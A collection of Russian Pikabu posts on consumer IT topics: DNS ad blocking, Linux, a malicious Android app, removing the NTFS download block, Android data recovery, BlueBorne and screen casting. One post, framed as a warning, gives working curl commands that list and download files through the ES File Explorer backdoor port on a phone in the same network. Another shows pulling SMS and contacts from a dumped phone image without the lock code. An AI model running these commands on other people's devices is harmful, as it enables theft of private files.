На самом деле здесь всё запутанней, сложнее и вообще, я, как старый "пират" не особо люблю айось за закрытость платформы, ну вы поняли)

Итак, настройка DNS в iOS (iPhone, iPad):1)Войдите в меню настроек устройства
2)Выберите пункт «Wi-Fi» (для мобильных сетей ручная настройка DNS невозможна).
3)Нажмите на название сети, к которой устройство подключено в данный момент.
4) В поле «DNS» введите введите адреса DNS:
176.103.130.130 (основной)
и
176.103.130.131(дополнительный)
чтобы прописать сервера AdGuard
либо
8.8.8.8
и
8.8.4.4
чтобы прописать DNS от Google

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост
Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост
Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост
Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

Итак, поздравляю!
Теперь и вы тоже прекрасны и можете наслаждаться пользованием телефоном без рекламы)

Кстати, если вы геймер и в играх смотрите рекламу - отключайте эти настройки, когда играете, иначе не видеть вам бонусного золота, алмазов и прочих плюшек))

Пы.Сы.
Если вы хотите иметь альтернативу, чуть ниже приведу список открытых DNS серверов с описанием:

OpenDNS
208.67.222.222 
208.67.220.220
 Достоинства:
Давно представлен на рынке
Блокирует фишинг-сайты
Дополнительная веб-фильтрация

Cloudflare
1.1.1.1 
1.0.0.1
 Достоинства:
Отличная производительность
Строгие правила конфиденциальности
Поддержка на форуме сообщества

Также Cloudflare ввел фильтрацию вредоносного ПО через серверы: 1.1.1.2 и 1.0.0.2
и блокировку контента для взрослых (особенно актуально будет тем, у кого маленькие детки пользуются смартфоном) через серверы 1.1.1.3 и 1.0.0.3.

Google Public DNS
8.8.8.8 
8.8.4.4
 Достоинства:
Прозрачность и соблюдение конфиденциальности
 Недостатки:
Предназначен для опытных пользователей

Яндекс.DNS
77.88.8.8 
77.88.8.1
 Достоинства:
Защита от вредоносного ПО
Стабильность
 Недостатки:
Не самая высокая скорость работы

Comodo Secure DNS
8.26.56.26 
8.20.247.20
 Достоинства:
Фокус на безопасность
Обработка припаркованных доменов
 Недостатки:
Не самая лучшая производительность

Quad9 DNS
9.9.9.9 
149.112.112.112
 Достоинства:
Высокий уровень производительности
Блокировка вредоносных доменов
 Недостатки:
Мало информации по настройке

Adguard DNS
176.103.130.130 
176.103.130.131
 Достоинства:
Блокировка рекламы, счетчиков и фишинг-сайтов
 Недостатки:
Блокируется не вся реклама из-за технологических ограничений

Пы.Пы.Сы. На этом всё) Пользуйтесь на здоровье, и пусть ваш интернет всегда будет чистым, а устройства без вирусов!))

Показать полностью 7
46

В Сети появились обои, которые выводят из строя Android-смартфоны

Ни в коем случае не устанавливайте их на фон.


В Сети появилось множество сообщений о фоновом изображении, которое «ломает» Android-смартфоны. Это на первый взгляд совершенно обычная картинка, которая при установке на рабочий стол выводит гаджет из строя — экран начинает постоянно включаться и выключаться, причём не помогает даже перезагрузка. Вот как это происходит.

Картинкой поделился авторитетный инсайдер Ice Universe, который предостерёг пользователей от её использования в качестве обоев рабочего стола. Особенно это касается владельцев устройств Samsung, хотя проблема встречается и на моделях других производителей, в том числе Nokia, Xiaomi и OnePlus.

В Сети появились обои, которые выводят из строя Android-смартфоны Длиннопост, Android, Краш, Баг, Смартфон, Информационная безопасность, Видео

Специалисты портала 9to5Google провели несколько тестов с этим изображением и пришли к выводу, что картинка не содержит в себе вируса — всё дело в её цветовой гамме. По умолчанию операционная система Android настроена на отображение sRGB-цветов, однако картинка использует RGB-гамму. И если Android 11 автоматически преобразует неподдерживаемое цветовое пространство, то в Android 10 этого не предусмотрено. Именно поэтому на устройствах со свежей ОС картина устанавливается на фон без проблем. Получается, «сломать» смартфон могут и любые другие изображения в RGB-гамме.


Обезвредить картинку можно любым редактированием — просто внесите какие-то изменения и пересохраните её. Если же вы уже установили RGB-изображение на фон и столкнулись с проблемой беспорядочного включения экрана, то вам необходимо удалить файл картинки, загрузившись в безопасном режиме, или сбросить устройство до заводских настроек.


Источник

Показать полностью 1
98

Linux для тебя

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Дисклеймер: Я никого не призываю переходить на другую операционную систему(ОС), а просто хочу показать, что существуют альтернативные ОС. Выбор всегда за вами.


Начну, пожалуй с истории. Все началось с UNIX систем, которые в конце 60-x годов были разработаны сотрудники компании Bell Labs. Они мало чем были похожи на современные ОС, просто терминал и компилятор под ассемблер. Компания AT&T, которой принадлежала Bell Labs понимала коммерческую ценность UNIX, но из-за запрета наложенного правительством США, компания могла заниматься только телефонными сетями и смежным оборудованием. Для того, чтобы обойти запрет, компания передала исходный код ОС некоторым высшим учебным заведениям. Одним из первых исходный код получил университет Беркли.

В университете Беркли начинается история семейства Berkeley Software Distribution (BSD) систем, которые считаются UNIX подобными ОС. Со временем большая часть кода была переписана сотрудниками университета, что в дальнейшем позволило отделится от AT&T. Про BSD системы обычный пользователь ничего не знает т.к. они не смогли получить большой популярности у обычных пользователей, об этом чуть позже. Но в тоже время компания Apple использовала большую часть кода FreeBSD для создания MacOS, Sony и Nintendo использовали ее для своих приставок, сервера WhatsApp и Netflix тоже работают под управлением ОС семейства BSD. Парадокс - непопулярная ОС используется в популярных продуктах.


В 1991 году Линус Торвальдс студент Хельсинского университета, начал написание ядра Linux. Когда он выложил исходный код, другие разработчики заинтересовались и стали помогать в разработке ядра.

Так почему более зрелая и мощная система BSD не сыскала популярности в open source сообществе в отличии от Linux? Все дело в лицензии под которой распространяется ОС. Лицензия BSD позволяет использовать ее код, а затем сделать его закрытым, так в свое время поступила Apple. С Linux так сделать нельзя, лицензия обязывает после изменения кода выложить его в открытый доступ, поэтому сообществу выгодно писать программное обеспечение (ПО) под лицензией Linux.

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

С того момента было создано огромное количество дистрибутивов на основе ядра Linux. Коммерческие организации также участвуют в разработке ядра и поддерживают open source сообщество.


Дерево Linux дистрибутивов(в высоком разрешении)

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Если посмотреть статистику использования ОС в сегменте персональных компьютеров, около 77% это Windows, 16% это MacOS и какие-то 2% Linux. Дело в том, что Windows и MacOS коммерческие ОС, которые продвигались на рынке ПК, когда Linux использовалась в основном для серверов и маршрутизаторов. На самом деле Linux работает в большем количестве устройств, чем может показаться на первый взгляд: маршрутизаторы, умная техника, смартфоны(Android основан на ядре Linux), супер компьютеры, сервера. Каждый день мы косвенно используем Linux. Ошибочно мнение, что Windows популярная ОС, исторически так сложилось, что большое количество ПО было написано под нее, дает о себе знать и сарафанное радио. Подавляющее большинство с детства пользуется ПК под управлением Windows и когда человек приобретает новый ПК или ноутбук, как правило с предустановленной Windows или устанавливает ее сам - дело привычки.


Теперь хочу рассказать как я познакомился с миром Linux. До университета я был обычным пользователем Windows и только слышал о существовании Linux. Когда мне пришлось по надобности столкнуться с этой ОС, а я ничего особо не знал, то я поставил самый популярный дистрибутив Ubuntu и пользовался им около недели. Он мне не понравился и я стал пробовать другие дистрибутивы. Дольше всего я использовал Fedora от Red Hat и Elementary OS. Сейчас использую Manjaro с рабочим окружением KDE, вообще рабочие окружения это отдельная тема. Существует огромное количество дистрибутивов и такое многообразие может отпугнуть неподготовленного пользователя.


Fedora с окружением Gnome
Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

elementary OS

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Manjaro с окружением KDE Plasma 5

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В основном, когда человек задумывается о переходе на новую ОС, его останавливает мысль об отсутствии привычных программ. Я провел небольшой опрос среди своих друзей и знакомых, чем они пользуются ежедневно для решения своих задач.

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В опросе участвовало 25 человек. Для большинства людей необходим браузер, офисный пакет, мессенджер и графический редактор. Большая часть ПО нативно есть под Linux, а остальная имеет достойные альтернативы. Например, пакет MS Office я заменил на Google Docs и Open Office, они прекрасно справляются со своими задачами и имеют обратную совместимость с MS Office. Для работы с фото Krita и Gimp, для видео DaVinci Resolve и Kdenlive, LMMS и Audacity использую для работы с аудио. Дефицита программ нет и они бесплатные.


Установил нескольким друзьям и девушке, пока всем всё нравится

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В СНГ пользователи персональных ПК не пользуются лицензионным софтом. Все привыкли пиратить все, что можно. За свою жизнь не встречал тех, кто имеет подписку Adobe или MS Office, кроме бизнес сегмента. В СНГ пиратство не наказуемо для пользователя ПК. Но кроме моральных терзаний, есть еще один момент, задумывались ли вы, какая выгода человеку, который взламывает ПО и отдает его в массы, это хорошая пища для размышления.


Что в итоге? Linux дает безопасность, стабильность, полный контроль над ОС и бесплатное ПО. Тем более попробовать Linux всегда можно не отказываясь от Windows - поставить на виртуальную машину или как вторую систему и в дальнейшем снести винду полностью перейти на Linux.

Показать полностью 7
576

Вредители в google play store

Пишу с целью предупредить.

У свекрови несколько месяцев на ее двух разных смартфонах с системой андроид была одна и та же жутко бесячая проблема - при любом действии в телефоне появлялась видео реклама без возможности закрыть ее от 5 до 30 секунд! Реклама включалась даже при заблокированном экране, при попытке зайти в вкладку открытых приложений вредитель тут же закрывался, при проверке доступа приложений ничего странного обнаружено не было, все ненужные и непонятные программы регулярно удалялись, несколько разных антивирусов ничего не выдавали, обновление и переустановка системы тоже.
Вчера сидела со свекровью, обсуждали эту проблему, искали решение и тут до меня дошло что если какой-то вредитель имеет возможность запускать рекламу поверх приложений и разблокировать экран, то личные данные тоже могут быть под угрозой.(да,только дошло)
Поиск в гулугулу помог найти прогу которая ловит все рекламные приложения, нашли фейсбук с его товарищами, сканер документов и какое-то левое приложение, его сразу снесли, но блин не помогло. Решили попробовать снести сканер и обоже рекламы больше нет! Приложение под названием Scanner Intiligent, которое безобидно трансформирует фотки в пдф - все это время терроризировало свекровь и скорее всего имело доступ к личным данным. Прошерстила коменты в гугловском магазине и реакция была просто *чтозахня*, стоит хорошая оценка 4,4, но больше 60% комментаторов пишут о том, что приложение само по себе фоткает, делает скрины экрана, неудержимый поток рекламы просто невозможно терпеть и многие добавляют в конце что пожаловались на приложение , но оно всё еще там.
Короче говоря, читайте комментарии под приложениями и надеюсь инфа кому-нибудь пригодится .

582

NTFS: блокировка файлов, полученных из интернета

Впервые с блокировкой файлов, скачанных из интернета или почты я столкнулся когда переносил файловый сервер. Наш сервер на Windows Server 2003 R2 приказал долго жить. Пока он ещё был в состояни и хоть как-то работать, был поднят новый сервер на базе Debian 6 и Samba 3. Разумеется все доменные фичи вроде Kerberos и Windbind также были подняты. И вот наступила ночь переноса данных.

Я столкнулся с тем, что Windows не дает скопировать файл, полученный из интернета или по почте. Для копирования требовалось открыть свойства файла и установить галочку "разблокировать", что учитывая объем данных, напрягало.

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

При открытии такого документа Word использует защищенный режим.

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

Причем здесь альтернативные потоки?

Давайте посмотрим все потоки данных для заблокированного файла. Для этого воспользуемся PowerShell командлетом Get-Item  с параметром -Stream *

PS C:\Users\mfc166\downloads> Get-Item LAPS_Datasheet.docx -Stream *

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

И PowerShell радостно нам рапортует о наличии двух потоков:

:$DATA - собственно данные самого файла

Zone.Identifier - это поток намекает на происхождение файла.


Давайте прочтем содержимое потока. Для этого воспользуемся PowerShell командлетом Get-Content с параметром  -Stream Zone.Identifier


PS C:\Users\mfc166\downloads> Get-Content LAPS_Datasheet.docx -Stream Zone.Identifier

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

Видим, что файл получен из третьей зоны. За пояснениями обратимся к KB182569.

Если кратко, то во описание зон - файл получен из интернета.

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

Есть разные утилиты, позволяющие работать с потоками. Та же Streams весьма хороша. Но мы рассмотрим PowerShell. Итак, что можно сделать с блокировкой файлов? Пути два: удалить поток или снять блокировку :


Удаление потока:

Remove-Item -Path LAPS_Datasheet.docx -Stream Zone.Identifier

Как видим, его больше нет:

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

Снятие блокировки:

Один файл я разблокировал, но ничего - их есть у меня. Вооружаемся всё тем-же PowerShell

Unblock-File LAPS_OperationsGuide.docx

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

На скрине видно, что я проверил наличие блокировки, снял её и убедился в отсутствии.

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

Снимать блокировку можно оптом:

PS C:\Users\mfc166\downloads> dir *.docx |Unblock-File

NTFS: блокировка файлов, полученных из интернета Windows, Microsoft, Файловая система NTFS, Информационная безопасность, Длиннопост

Мы видим, что третий файл, также скачанный из интернета, потерял блокировку.


Если кому будет интересно, могу рассказать о потоках данных подробнее.

Показать полностью 7
1354

Бэкдор в ES File Explorer File Manager, позволяющий скачать любой файл из твоего телефона

Цель данного поста - предупредить пользователей и предостеречь от использования дырявого говнопродукта, автор не призывает использовать приведённую ниже информацию для получения доступа к чужим данным, т.к. можно получить путёвку на 2 года с бесплатным шампанским.


Недавно нашли бэкдор в ES File Manager, приложение просто создало http сервер не защищённый паролем на порту 59777, который позволяет получить список всех файлов, приложений, скачать файлы, запустить любое из установленных приложений и многое другое, ES File Manager об этом, естественно, никак не предупреждает пользователя. Таким образом, чувак из той же сети(например в маке) может получить доступ ко всем вашим файлам.


Вроде первый написал этот чувак https://twitter.com/fs0c131y/status/1085460755313508352

Вот тут сделали скрипт для работы с сервером https://github.com/fs0c131y/ESFileExplorerOpenPortVuln


Я скрипт не запускал, а воспользовался curl'ом


Пишем:

> curl --header "Content-Type: application/json" -X POST http://192.168.1.3:59777/ --data '{"command":"listPics"}'

Где 192.168.1.3 - IP моего телефона в сети. Получаем список всех фоток на телефоне:

[

{"name":"IMG_20180802_192056_HHT.jpg", "time":"8/2/18 08:20:56 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180802_192056_HHT.jpg", "size":"1.64 MB (1,720,783 Bytes)", },

{"name":"IMG_20180728_160906.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_160906.jpg", "size":"4.69 MB (4,914,234 Bytes)", },

{"name":"IMG_20180801_120928.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180801_120928.jpg", "size":"5.68 MB (5,951,479 Bytes)", },

{"name":"IMG_20180728_132235.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_132235.jpg", "size":"4.94 MB (5,176,983 Bytes)", },

{"name":"IMG_20180728_155557.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_155557.jpg", "size":"4.08 MB (4,275,890 Bytes)", },

{"name":"IMG_20180730_103456.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180730_103456.jpg", "size":"3.60 MB (3,776,144 Bytes)", },

Скачивать вот так:

> curl --header "Content-Type: application/json" http://192.168.1.3:59777/storage/2C7B-180C/DCIM/Camera/IMG_2... > /tmp/pic.jpg

Только что поставил последнюю версию с play маркета, запустил - бекдор есть.

86

Повышаем привилегии обычного user до Administrator (RID Hijacking)

Интересная уязвимость, благодаря которой можно повысить привилегии обычного юзера до администратора. Уязвисости подвержены все версии Windows начиная с XP и заканчивая Windows 10. Также подвержены и серверные ОС (2003-2016).  Патча по сей день нету.

104

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android.

Я ни чуть не гуру в Android и информационных технологий в целом, но где-то по чуть-чуть что-то цепляю.

Прилетел сегодня аппарат: Lenovo S860. Девайс на MediaTek 6582. Робот древний (вроде v4.4) и не знаю, будет ли эта инструкция работать с Android 5+ (по крайней мере говорили, что начиная с 5-ой версии данные зашифрованы). Так что делайте на свой страх и риск. Данные вряд ли потеряете, но какое-то время это всё-таки займёт.

Симптомы: висит на лого "Lenovo" и больше ничего. В recovery заходит, но обновление из update.zip, закинутого в корень в бородатые года, не загружает и вываливается с ошибкой. Трэба: вытащить данные. Ну, что ж, мой первый опыт по выуживанию данных с зелёных вёдер (просто речевой оборот, ничего против Android не имею, если что). Приступим.


Первое, что нужно сделать: установить драйвер устройства. Заходим на 4pda, страница "Прошивки" конкретного девайса, и обычно там есть раздел "Драйвера и утилиты". Качаем драйвера (или автоустановщик драйверов). У меня Windows 10, и это основная проблема. Драйвера идут, как правило, на версии Windows XP, Vista и 7. Выше нет, как и ниже (олдфаги на Win95 негодуэ).

Скачали драйвер, а там вместо EXE-шника лежит какой-то непонятный INF. Лезем в диспетчер устройств (в W10 – ПКМ по "Пуску" – Диспетчер устройств"), тычем снизу на имя компьютера или название любого из разделов и сверху нажимаем "Действие" – "Установить старое устройство".

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Далее – Установка оборудования выбранного из списка вручную – Далее – Показать все устройства – Далее – Установить с диска – *выбираем *.inf файл из папки с драйвером для последней версии ОС*

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Дальше "Открыть" – ОК – Далее – Далее. Внимательно смотрим, установилось ли. Если ошибка а-ля "Драйвер не подписан, иди на йух", придётся заморочиться: нажимаем на "Пуск", зажимаем и не отпускаем Shift на клавиатуре – Жмём на иконку выключения компьютера – Так же не отпуская Shift жмём на "Перезагрузка", теперь отпускаем Shift – Выбираем "Дополнительные параметры" – "Параметры загрузки" – Перезагрузить.

После перезагрузки появляются варианты выбора. Ищем глазами "Отключить обязательную проверку подписей драйверов" (пункт 7). Жмём F7. Шиндоус загружается в обычном режиме. Повторяем действия с установкой драйверов. После этого драйвера должны встать. Если не встали – ищите более новые, с поддержкой хотя бы W8 (как показывает практика, в большинстве случаев они совместимы с W10). Если не нашли – ебаште молотком по мобиле и говорите, что так и было.


Продолжим. Дальше нам нужна софтина SP Flash Tool (прошивальщик для смартфонов на процессоре MTK). Можно найти в свободном доступе на любом сайте вроде 4pda. Желательно версию поновее, так как в старых нет возможности скопипиздить данные с смартфона. Так же нужна прошивка от данного девайса, желательно оригинальная, можно взять с того же 4pda (нам оттуда нужен scatter-файл – эдакая штуковина, в которой записано "откуда и до куда" находятся определённые разделы с данными).


В разделе Download указываем scatter (как правило, он идёт единственный в архиве с расширением *.txt, и его можно найти, немного пошароёбившись по папкам из архива с прошивкой. Кроме того, как правило, у него в названии есть слово "scatter".

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Дальше переходим на вкладку "Memory Test" и оставляем галки только напротив "RAM Test" и "Data Bus Test". Тычем "Start". Телефон к этому моменту должен быть выключен. Подключаем смартфон кабелем к компьютеру и идём пить чай, потому что процесс тестирования займёт минут 5-10 времени. Если процесс не пошёл (а это зелёная полоса снизу), попробуйте включить телефон (зажать кнопку питания на 3 секунды) или зайти в рекавери (обычно это сочетания кнопок громкости с кнопкой питания, вроде "громкость+ и питание", или "громкость- и питание", или же "обе громкости и питание". ну иногды бывает учавствует кнопка "меню", если она не сенсорная) и потыкаться там (мне помогла попытка загрузки обновления, ошибка и перезагрузка).

В результате получаем что-то вроде этого (нужно подняться чуть выше в окне результатов):

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Нас интересует строка "EMMC_PART_USER", а точнее её значение (в HEX-виде). Выделил его. У каждого процессора оно может быть разное, так что вариант "перепишу, что на скрине написано", не прокатит. Копируем в буфер обмена. Отключаем кабель от телефона.

Переходим на вкладку "Readback" и жмём "Add". Выбираем, куда сохранить файл. "Start Address" оставляем каким он и был, а в "Length" вставляем значение, скопированное из вкладки "Memory Test". В результате получаем а-ля такое:

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Тычем "Read Back" и снова подключаем телефон. Начинается процесс копирования данных с смартфона на кампухтир. Идём глушить вискарь с колой, потому что размер файла выглядит приблизительно как количество памяти в телефоне (в моём случае это 14.6Гб), и копирование, лично у меня, заняло 44 минуты. Получаем вот такой вот файл без расширения.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Дальше трэба программа R-Studio. Видел где-то софтину DiskInternals Linux Reader, но у меня она не взлетала с ошибкой "Unallocated image". Переразмечать разделы я не решился, потому что в линуксовых разделах я, мягко говоря, кусог ковна ничтожество "моя твоя не понимать". Возможно есть какие-то аналоги, но я в этом профан, так что готов выслушать конструктивные комментарии на эту тему.

Полная версия (network edition) стоит 180 бачей (по текущему курсу – 11300 русских деревянных). Но со мной всё понятно:

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Не пиратствуйте! Це плохо, дорогие мои........... Хех. Аж самому смешно.


Заходим в софтину. Тычем "Открыть образ". В поле "Тип файла" выбираем "Все файлы". Выбираем наш образ.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

*евпаторий, сколько на скрине компромата на одного меня*


Дружно смотрим в левое окно "Диски", а конкретно в раздел "Файлы образов". Тычем на файл только что открытого образа и жмём "Сканировать".

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Некоторое количество времени длится сканирование образа (у меня заняло 2 минуты и 16 секунд, как видно на скрине). Ниже образа появляются разделы "Recognized0", "Recognized1", "Recognized2" и "Raw Files". Разделы (количество и имена) могут меняться в зависимости от устройства, процессора и прошивки.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Самое вкусное (разумеется, с целью восстановления) хранится в самом большом разделе (в данном случае – "Recognized2"). Базы данных можно открыть софтиной SQLite Browser.


Root > Data > com.android.providers.telephony > databases > mmssms.db – база данных СМС/ММС. Самая "вкусная" таблица – "sms":

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Контакты хранятся в Root > Data > com.android.providers.contacts > databases > contacts.db (или contacts2.db). Их оттуда можно выудить тем же SQLite Browser, вкладка "Данные", таблица "data", поля "data1", "data2", "data3" и "data4". Придётся долго ломать голову, кто и где есть кто и где, потому что зелёное ведро записывает данные хуй пойми в каком формате очень непонятно.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Root > media > 0 – тут хранится всё, что открывается в проводнике, если подключить смартфон к компьютеру. Фото, сделанные стандартным приложением фотокамеры, обычно хранятся в DCIM > Camera

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Сейв-пикчи и некоторые данные ВКонтакта хранятся в ".vkontakte" и "VK". Viber – в "viber". WhatsApp аналогично. Телега вроде как тоже – просто в "Telegram". Тут её не было, просто на память пишу.


...


Ёптамать, хотел уже отправить пост, а главное – забыл. Как восстановить данные: тычете на файл или папку ПКМ – Восстановить.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

В окне выбираете в поле "В папку" – куда сохранится этот файл, галочки оставляете "как есть". Тычете "Да" и немножко ждёте.


Ну.. Вроде всё. Буду очень рад, если три часа написания инструкции (при учёте получаса, на который забрали электричество и я всё переписывал заново) хотя бы кому-нибудь помогут. Удачи карочи.


З.Ы. @admin, поправь уже баянометр, он показывает два поста с 100% совпадением изображения и два с 94% совпадением. Посты вообще никак с темой не связаны.

UPD: Опробовал данный способ на другом аппарате: Lenovo A7010 (MT6753) и установленной Resurrection Remix OS (Android 7.1.2). Так же в системе был установлен графический ключ и вход по отпечатку. Никаких лишних манипуляций производить не пришлось, а даже наоборот: разделы отобразились сразу же после открытия образа, даже не пришлось его сканировать.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Самое "вкусное" в разделе "userdata" (на скриншоте всеми любимые фотографии с камеры). Всё прекрасно восстанавливается, не запрашивая ни паролей, ни графических ключей.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Контакты сохранены в Root > data > com.android.dialer > databases > dialer.db . Возможно, другое расположение контактов – это частный случай, так как система – не оригинальный Android, а модифицированный, но если не найдёте файла базы в com.android.providers.telephony > databases, то посмотрите ещё и в com.android.dialer. База точно так же открывается нашим любимым SQLite Browser, и конкретно в этом случае вид вполне себе приятный: номер телефона и имя контакта в читаемом виде.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Если была установлена другая "звонилка", то, вероятно, база данных контактов лежит в папке с названием этой самой "звонилки". Название таблицы, в которой лежат номера, зависит уже непосредственно от самой "звонилки".


Ну и кусок ненужной информации под конец. Немного по теме первого телефона, с которого всё это и началось: после восстановления данных заметил, что часть фото "побито", то есть не открывается: порядка 10-20 штук из 250 фото. Последующая попытка прошивки устройства поставила всё на свои места: умерла память. Возможность считать с себя данные ещё дал, а вот залить новые – уже нет. Менять нецелесообразно: телефон сам по себе старый, на замену уже куплен новый, новая память обойдётся примерно в 3-5 тысяч, замена (если не самостоятельно) ещё 1-2 тысячи. Так что выпьем же за упокой. Ну, вроде всё: история закончена. Такие дела, малята.

Показать полностью 16
270

Отключайте Bluetooth, или же уязвимость "BlueBorne"

Всем привет. Наверняка, в вашем телефоне/компьютере/планшете и т.д. есть Bluetooth. Оказывается, если вы его не отключаете в публичных местах это может повлечь за собой серьезные последствия. Например, над вашим телефоном будет полностью перехвачен контроль, а вы и не заметите.

Отключайте Bluetooth, или же уязвимость "BlueBorne" Вирус, Bluetooth, Android, Windows, Linux, Уязвимость, Привет читающим теги

Сначала, злоумышленник смотрит, какие есть устройства со включенным Bluetooth поблизости. Допустим, он нашел ваш телефон. Определяет MAC-адрес и операционную систему, которую вы используете. Далее, он уже может делать все что угодно, лучше всего показывает эту уязвимость данный ролик: https://www.youtube.com/watch?v=Az-l90RCns8 (Пикабу запрещает мне публиковать видео прямо в посте :( )


Из этого всего можно сделать вывод, то что даже если вы используете антивирус, не подключаетесь к публичным Wi-Fi сетям, но забыли выключить Bluetooth, то любой предприимчивый хакер может перехватить контроль над вашим банковским приложением через Bluetooth.


Отключайте Bluetooth, товарищи пикабушники.

1369

Трансляция экрана телефона на Android на компьютер на Windows 10.

Мало кто знает, что в Windows 10 "из коробки" есть трансляции экрана. Это удобно, если в домашней сети есть Chromecast приставка или телевизор, скорее всего от Samsung, с поддержкой Miracast. Обе эти технологии позволяют видеть копию происходящего на экране телефона/планшета/ноутбука на большом внешнем экране. Это удобно, например для показа фоток и/или видео в гостях не на экране смартфона, а на большом экране. Разница между Chromecast и Miracast в том, что первый может работать в фоне. Например через Chromecast можно транслировать фильм на телевизор и при этом листать ленту на том же пикабу. Miracast работает подругому - что на экране девайса, то и транслируется.


Однако в Windows 10 появилась обратная функция. Система может работать как Chromecast/Miracast устройство, т.е. принимать трансляции. Всё зависит от типа видеокарты. Например, мой старенький ноут 2012 года с Nvidia 740M, умеет принимать трансляции, а вот более старый компьютер с Nvidia 9600GT - уже нет. Но это только половина дела. Поддержка трансляции экрана есть в Android четвёртой версии и выше. По крайней мере на самом старом моём девайсе с Android 4.2.2 эта функция есть. Значит можно заставить практически любой, не очень древний, Android-смартфон транслировать свой экран на любой комп/ноут средней свежести на Windows 10. Главное условие - устройства должны находиться в одной сети и должны видеть друг друга. Например, и ноут и телефон должны быть подключены к одной и той же Wi-Fi сети.


Чтож, приступим. Кликаем на иконку уведомлений или нажимаем win+A.

